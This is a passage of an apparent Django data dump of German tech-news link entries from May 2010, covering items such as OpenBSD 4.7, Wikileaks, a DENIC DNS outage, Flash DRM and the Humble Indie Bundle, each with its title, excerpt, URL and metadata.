&lt;/p&gt;</field><field type="CharField" name="external_url">http://fosspatents.blogspot.com/2010/05/german-high-court-declares-all-software.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/softwarepatent-durch-bgh-bestatigt_.png</field><field type="SlugField" name="slug">softwarepatent-durch-bgh-bestatigt</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 15:37:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object><object pk="3"></object><object pk="4"></object><object pk="7"></object></field></object><object pk="170" model="submitter.newsentry"><field type="CharField" name="title">OpenBSD 4.7 released</field><field type="TextField" name="excerpt">OpenBSD 4.7 mit neuen Treibern und Plattformen released.
*Krass, OpenBSD gibt es ja immer noch. *</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;OpenBSD 4.7 mit neuen Treibern und Plattformen released.
&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Krass, OpenBSD gibt es ja immer noch. &lt;/em&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.openbsd.org/47.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/openbsd-47-released.png</field><field type="SlugField" name="slug">openbsd-47-released</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 15:31:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="169" model="submitter.newsentry"><field type="CharField" name="title">Example for on-line activism</field><field type="TextField" name="excerpt">Greenpeace net-action against palm oil usage of Nestle was a big success.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Greenpeace net-action against palm oil usage of Nestle was a big success.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://australianetworknews.com/story.htm?id=29302</field><field type="FileField" name="page_screenshot">page_shots/2010/05/19/no_page_shot.png</field><field type="SlugField" name="slug">example-for-on-line-activism</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-19 16:40:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="168" model="submitter.newsentry"><field type="CharField" name="title">Wikileaks is back</field><field type="TextField" name="excerpt">Finally :-) Still support it.
[Julians Pass einkassiert, wiedergegeben um ihn demnächst zu canceln](http://www.theage.com.au/technology/technology-news/australian-wikileak-founders-passport-confiscated-20100516-v6dw.html)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Finally :-) Still support it.
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.theage.com.au/technology/technology-news/australian-wikileak-founders-passport-confiscated-20100516-v6dw.html"&gt;Julians Pass einkassiert, wiedergegeben um ihn demnächst zu canceln&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://wikileaks.org/wiki/Wikileaks</field><field type="FileField" name="page_screenshot">page_shots/2010/05/19/wikileaks-is-back_.png</field><field type="SlugField" name="slug">wikileaks-is-back</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-19 14:32:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="167" model="submitter.newsentry"><field type="CharField" name="title">Youtube streamt über zwei Milliarden Videoclips pro Tag, 5 Jahre alt</field><field type="TextField" name="excerpt">5 Jahre Youtube, 2 Mrd Filme pro Tag gestreamt</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;5 Jahre Youtube, 2 Mrd Filme pro Tag gestreamt
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Youtube-streamt-ueber-zwei-Milliarden-Videoclips-pro-Tag-1001922.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/18/heise-online-youtube-streamt-uber-zwei-milliarde__.png</field><field type="SlugField" name="slug">heise-online-youtube-streamt-uber-zwei-milliarde</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-18 22:57:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">youtube</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="6"></object></field></object><object pk="166" model="submitter.newsentry"><field type="CharField" name="title">CCC | Prix Ars Electronica 2010</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.ccc.de/de/updates/2010/prix-ars-electronica-2010</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/ccc-prix-ars-electronica-2010.png</field><field type="SlugField" name="slug">ccc-prix-ars-electronica-2010</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 23:29:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">arselectronica ccc</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="165" model="submitter.newsentry"><field type="CharField" name="title">US military chokes on stream from robots' fat pipes • The Register</field><field type="TextField" name="excerpt">Lt Gen Deptula, USAF deputy chief of staff for intelligence, surveillance and reconnaissance, told Defence Industry Daily: “We are going to find ourselves in the not too distant future swimming in sensors and drowning in data.” In 2009 US drones recorded _24 years of video footage_ - newer drones are expected to increase this by a factor of 30 by 2011.
Another solution being examined by the Navy is "data fusion" - adding geographical information to existing video footage to make it more usable</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Lt Gen Deptula, USAF deputy chief of staff for intelligence, surveillance and reconnaissance, told Defence Industry Daily: “We are going to find ourselves in the not too distant future swimming in sensors and drowning in data.” In 2009 US drones recorded &lt;em&gt;24 years of video footage&lt;/em&gt; - newer drones are expected to increase this by a factor of 30 by 2011.
&lt;/p&gt;
&lt;p&gt;Another solution being examined by the Navy is "data fusion" - adding geographical information to existing video footage to make it more usable
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/17/us_army_drones_info_overload/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/us-military-chokes-on-stream-from-robots-fat-pipe_.png</field><field type="SlugField" name="slug">us-military-chokes-on-stream-from-robots-fat-pipe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 23:13:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">drone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="164" model="submitter.newsentry"><field type="CharField" name="title">
Infosecurity (UK) - Facebook identifies hacker selling 1.5 million accounts
</field><field type="TextField" name="excerpt">Reports are coming in that Facebook has identified the self-proclaimed hacker who was offering to sell batches of 1000 Facebook accounts - up to 1.5 million in total - and it appears that the Russian hacker was wildly overstating the account numbers.
McMillan says that Kirllos had been selling batches of 1000 accounts at between $25 and $45 a batch.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Reports are coming in that Facebook has identified the self-proclaimed hacker who was offering to sell batches of 1000 Facebook accounts - up to 1.5 million in total - and it appears that the Russian hacker was wildly overstating the account numbers.
&lt;/p&gt;
&lt;p&gt;McMillan says that Kirllos had been selling batches of 1000 accounts at between $25 and $45 a batch.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.infosecurity-magazine.com/view/9478/facebook-identifies-hacker-selling-15-million-accounts/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/infosecurity-uk-facebook-identifies-hacker.png</field><field type="SlugField" name="slug">infosecurity-uk-facebook-identifies-hacker</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 21:38:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">accounts facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="163" model="submitter.newsentry"><field type="CharField" name="title">Google Street View logs WiFi networks, Mac addresses • The Register</field><field type="TextField" name="excerpt">siehe auch WLAN Urteil</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;siehe auch WLAN Urteil
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/google-street-view-logs-wifi-networks-mac-address.png</field><field type="SlugField" name="slug">google-street-view-logs-wifi-networks-mac-address</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 17:36:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">google streetview wlan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="162" model="submitter.newsentry"><field type="CharField" name="title">Google abandons smart phone Web store - The Globe and Mail</field><field type="TextField" name="excerpt">The titel says it all.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The titel says it all.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theglobeandmail.com/news/technology/google-abandons-smart-phone-web-store/article1569217/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/google-abandons-smart-phone-web-store-the-globe.png</field><field type="SlugField" name="slug">google-abandons-smart-phone-web-store-the-globe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 17:34:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">android google phone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="161" model="submitter.newsentry"><field type="CharField" name="title"> Wikileaks founder told his passport will be cancelled | TG Daily</field><field type="TextField" name="excerpt">According to The Age, Assange had his passport taken away on his arrival at Melbourne airport last week. While it was returned 15 minutes later, Assange said he was told it would be cancelled.
Assange said that shortly after his passport was returned he was questioned about a hacking offence committed when he was a teenager.
Assange told the television program Dateline that Australia is one of several countries where he feels unsafe.
"There are places… Dubai, who is trying to have us arrested, Switzerland under the bank secrecy laws, Cayman Islands," he said. "Australia had the federal police in relation to its censorship list so there are some jurisdictions that from time to time it wouldnt be sensible to go there."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;According to The Age, Assange had his passport taken away on his arrival at Melbourne airport last week. While it was returned 15 minutes later, Assange said he was told it would be cancelled.
&lt;/p&gt;
&lt;p&gt;Assange said that shortly after his passport was returned he was questioned about a hacking offence committed when he was a teenager.
&lt;/p&gt;
&lt;p&gt;Assange told the television program Dateline that Australia is one of several countries where he feels unsafe.
&lt;/p&gt;
&lt;p&gt;"There are places… Dubai, who is trying to have us arrested, Switzerland under the bank secrecy laws, Cayman Islands," he said. "Australia had the federal police in relation to its censorship list so there are some jurisdictions that from time to time it wouldnt be sensible to go there."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.tgdaily.com/business-and-law-features/49782-wikileaks-founder-told-his-passport-will-be-cancelled</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/wikileaks-founder-told-his-passport-will-be-cance.png</field><field type="SlugField" name="slug">wikileaks-founder-told-his-passport-will-be-cance</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-17 17:31:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="160" model="submitter.newsentry"><field type="CharField" name="title">Pirate Bay ISP hit with German injunction; must stop hosting</field><field type="TextField" name="excerpt">The district court in Hamburg, Germany has issued an injunction against Cyberbunker and its owner, Sven Olaf Kamphuis, demanding that he cut off service to The Pirate Bay.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The district court in Hamburg, Germany has issued an injunction against Cyberbunker and its owner, Sven Olaf Kamphuis, demanding that he cut off service to The Pirate Bay.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/05/pirate-bay-isp-hit-with-german-injunction-must-stop-hosting.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/13/pirate-bay-isp-hit-with-german-injunction-must-st.png</field><field type="SlugField" name="slug">pirate-bay-isp-hit-with-german-injunction-must-st</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-13 22:10:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">cyberbunker isp piratebay</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="159" model="submitter.newsentry"><field type="CharField" name="title">Gigapan: Das größte Foto der Welt hat 45 Gigapixel</field><field type="TextField" name="excerpt">Dreieinhalb Stunden musste der US-Fotograf Gerald Donovan in luftiger Höhe ausharren, dann war das derzeit größte Foto der Welt fertig. Es zeigt ein Panorama der Stadt Dubai. Die 4.250 Einzelbilder hat eine Maschine geknipst.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Dreieinhalb Stunden musste der US-Fotograf Gerald Donovan in luftiger Höhe ausharren, dann war das derzeit größte Foto der Welt fertig. Es zeigt ein Panorama der Stadt Dubai. Die 4.250 Einzelbilder hat eine Maschine geknipst.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1005/75067.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/gigapan-das-groumlszligte-foto-der-welt-hat-4_.png</field><field type="SlugField" name="slug">gigapan-das-groumlszligte-foto-der-welt-hat-4</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 23:27:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">picture pixel</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="158" model="submitter.newsentry"><field type="CharField" name="title">Denic: Probleme mit den .de-Rootservern?</field><field type="TextField" name="excerpt">DeNIC antwortet mal mit einer Runde NXDOMAIN auf Anfragen und macht so das .de Internet kaputt.
Grund: fehlerhafte Aktualisierung der Nameserverdaten
Nach Auskunft von DeNIC war dieser regelmäßige 2-stündige Kopiervorgang, bei dem die aus der Registrierungsdatenbank erzeugte Zonendatei übertragen wird, nach etwa einem Drittel der Datensätze abgebrochen worden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;DeNIC antwortet mal mit einer Runde NXDOMAIN auf Anfragen und macht so das .de Internet kaputt.
Grund: fehlerhafte Aktualisierung der Nameserverdaten
&lt;/p&gt;
&lt;p&gt;Nach Auskunft von DeNIC war dieser regelmäßige 2-stündige Kopiervorgang, bei dem die aus der Registrierungsdatenbank erzeugte Zonendatei übertragen wird, nach etwa einem Drittel der Datensätze abgebrochen worden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1005/75090.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/17/denic-probleme-mit-den-de-rootservern-update-2.png</field><field type="SlugField" name="slug">denic-probleme-mit-den-de-rootservern-update-2</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 23:24:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">denic dns</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="157" model="submitter.newsentry"><field type="CharField" name="title">Air Force suffers collateral damage from PS3 firmware update</field><field type="TextField" name="excerpt">The Air Force Research Laboratory in Rome, New York picked up 336 PS3 systems in 2009 and built itself a 53 teraFLOP processing cluster. Once completed as a proof of concept, Air Force researchers then scaled up by a factor of six and went in search of 2,200 more consoles (later scaled back to 1,700). The $663,000 contract was awarded on January 6, 2010, to a small company called Fixstars that could provide 1,700 160GB PS3 systems to the government.
Now it doesn't run anymore!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Air Force Research Laboratory in Rome, New York picked up 336 PS3 systems in 2009 and built itself a 53 teraFLOP processing cluster. Once completed as a proof of concept, Air Force researchers then scaled up by a factor of six and went in search of 2,200 more consoles (later scaled back to 1,700). The $663,000 contract was awarded on January 6, 2010, to a small company called Fixstars that could provide 1,700 160GB PS3 systems to the government.
&lt;/p&gt;
&lt;p&gt;Now it doesn't run anymore!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/gaming/news/2010/05/how-removing-ps3-linux-hurts-the-air-force.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/air-force-suffers-collateral-damage-from-ps3-firmw_.png</field><field type="SlugField" name="slug">air-force-suffers-collateral-damage-from-ps3-firmw</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 14:13:27</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">airforce otheros ps3 sony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="156" model="submitter.newsentry"><field type="CharField" name="title">Hartz IV: Kein Geld für Computer | tagesschau.de</field><field type="TextField" name="excerpt">Harz iv Leute brauchen keine Computer</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Harz iv Leute brauchen keine Computer
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.tagesschau.de/inland/hartzcomputer100.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/hartz-iv-kein-geld-fur-computer-tagesschaude.png</field><field type="SlugField" name="slug">hartz-iv-kein-geld-fur-computer-tagesschaude</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 12:00:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">harziv</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="155" model="submitter.newsentry"><field type="CharField" name="title">heise online - BGH schränkt Folgen der Störerhaftung für WLAN-Betreiber ein</field><field type="TextField" name="excerpt">Besonders bitter dürfte den Urheberrechts-Massenabmahnern ein Hinweis des BGH bezüglich der Höhe der Abmahngebühren aufstoßen. Der für Urheberrechtssachen zuständige 1. Senat des höchsten Gerichts merkte an, dass es seit 2008 den Absatz 2 des Paragrafen 97a Urheberechtsgesetz (UrhG) gibt. Dieser sieht eine Höchstgrenze von 100 Euro für Urheberrechtsabmahnungen dann vor, wenn es sich um "einfach gelagerte Fällen mit einer nur unerheblichen Rechtsverletzung außerhalb des geschäftlichen Verkehrs" handelt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Besonders bitter dürfte den Urheberrechts-Massenabmahnern ein Hinweis des BGH bezüglich der Höhe der Abmahngebühren aufstoßen. Der für Urheberrechtssachen zuständige 1. Senat des höchsten Gerichts merkte an, dass es seit 2008 den Absatz 2 des Paragrafen 97a Urheberechtsgesetz (UrhG) gibt. Dieser sieht eine Höchstgrenze von 100 Euro für Urheberrechtsabmahnungen dann vor, wenn es sich um "einfach gelagerte Fällen mit einer nur unerheblichen Rechtsverletzung außerhalb des geschäftlichen Verkehrs" handelt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/BGH-schraenkt-Folgen-der-Stoererhaftung-fuer-WLAN-Betreiber-ein-998591.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/heise-online-bgh-schrankt-folgen-der-storerhaftu.png</field><field type="SlugField" name="slug">heise-online-bgh-schrankt-folgen-der-storerhaftu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 10:39:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">bgh filesharing wlan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="154" model="submitter.newsentry"><field type="CharField" name="title">Adobe's new Flash DRM comes with selective output control</field><field type="TextField" name="excerpt">Was Flash echt noch gefehlt hat: _DRM_</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Was Flash echt noch gefehlt hat: &lt;em&gt;DRM&lt;/em&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/media/news/2010/05/adobes-new-flash-drm-comes-with-selective-output-control.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/adobes-new-flash-drm-comes-with-selective-output.png</field><field type="SlugField" name="slug">adobes-new-flash-drm-comes-with-selective-output</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 10:31:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">adobe drm flash</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="153" model="submitter.newsentry"><field type="CharField" name="title">The Humble Indie Bundle (pay what you want for five awesome indie games)</field><field type="TextField" name="excerpt">Humble Bundle gets &gt; $ 1 mio
Win user average $8
Mac user average $10
Linux user average $14.5</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Humble Bundle gets &amp;gt; $ 1 mio
&lt;/p&gt;
&lt;p&gt;Win user average $8
Mac user average $10
Linux user average $14.5
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wolfire.com/humble</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/the-humble-indie-bundle-pay-what-you-want-for-fiv.png</field><field type="SlugField" name="slug">the-humble-indie-bundle-pay-what-you-want-for-fiv</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 10:22:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">games</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="152" model="submitter.newsentry"><field type="CharField" name="title">Amazon Spying On Your Ebook Highlighting | Techdirt</field><field type="TextField" name="excerpt"> Amazon will now [remotely upload and store the user notes and highlights](http://redtape.msnbc.com/2010/05/as-the-battle-of-e-book-readers-heats-up-amazon-is-trying-to-beat-the-competition-by-continually-adding-new-features-to-its.html#posts) you take on your Kindle, which it then compiles into "popular highlights." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; Amazon will now &lt;a href="http://redtape.msnbc.com/2010/05/as-the-battle-of-e-book-readers-heats-up-amazon-is-trying-to-beat-the-competition-by-continually-adding-new-features-to-its.html#posts"&gt;remotely upload and store the user notes and highlights&lt;/a&gt; you take on your Kindle, which it then compiles into "popular highlights."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://techdirt.com/articles/20100511/1018059377.shtml</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/amazon-spying-on-your-ebook-highlighting-techdir.png</field><field type="SlugField" name="slug">amazon-spying-on-your-ebook-highlighting-techdir</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 10:17:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">amazon kindle</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="151" model="submitter.newsentry"><field type="CharField" name="title">Privacy watchdog looks into NHS data breach | Security Threats | ZDNet UK</field><field type="TextField" name="excerpt">loss of a data stick containing information on psychiatric patients in Scotland on a memory stick. Typ gefeuert.
Deputy information commissioner David Smith told the Infosecurity Europe 2010 conference last week that the NHS was the biggest single UK organisation that loses data. *Since November 2007, 287 out of 962 serious data loss incidents have been by the NHS.*</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;loss of a data stick containing information on psychiatric patients in Scotland on a memory stick. Typ gefeuert.
&lt;/p&gt;
&lt;p&gt;Deputy information commissioner David Smith told the Infosecurity Europe 2010 conference last week that the NHS was the biggest single UK organisation that loses data. &lt;em&gt;Since November 2007, 287 out of 962 serious data loss incidents have been by the NHS.&lt;/em&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.co.uk/news/security-threats/2010/05/06/privacy-watchdog-looks-into-nhs-data-breach-40088863/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/12/privacy-watchdog-looks-into-nhs-data-breach-sec001.png</field><field type="SlugField" name="slug">privacy-watchdog-looks-into-nhs-data-breach-sec001</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-12 10:10:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">dataloss uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="149" model="submitter.newsentry"><field type="CharField" name="title"> 'Zombie' satellite runs amok in Earth's orbit - CSMonitor.com
</field><field type="TextField" name="excerpt">Galaxy 15, geo-stationary sat out-of-control after solar flare.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Galaxy 15, geo-stationary sat out-of-control after solar flare.
